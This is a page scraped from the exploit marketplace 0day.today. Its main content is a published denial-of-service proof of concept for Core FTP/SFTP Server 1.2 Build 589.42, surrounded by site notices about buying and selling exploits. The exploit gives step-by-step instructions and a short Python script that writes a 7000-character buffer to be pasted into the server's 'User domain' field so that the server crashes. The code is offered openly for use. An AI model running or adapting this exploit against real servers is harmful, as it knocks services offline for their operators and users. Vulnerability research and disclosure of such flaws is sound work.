0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Core FTP / SFTP Server 1.2 Build 589.42 - User domain Denial of Service Exploit
#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Vendor Homepage: http://www.coreftp.com/ #Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe #Tested Version: v2-Build 673 #Tested on: Windows 7 Service Pack 1 x32 #Steps to produce the crash: #1.- Run python code: Core_FTP_SFTP_Server_1.2.py #2.- Open core_code.txt and copy content to clipboard #3.- Open Core FTP Server #4.- Select "Setup" > "New" #5.- Select "Domain Name" and Put "Test" #6.- Select "Domain IP/Address" and Put "1.1.1.1" #7.- Select "Base directory" and Choose a directory path #8.- Enable "WinNT users" #9.- Select "User domain" and Paste Clipboard #10.- Click on "Ok" and the next window click "Ok" #11.- Crashed cod = "\x41" * 7000 f = open('core_code.txt', 'w') f.write(cod) f.close() # 0day.today [2024-12-24] #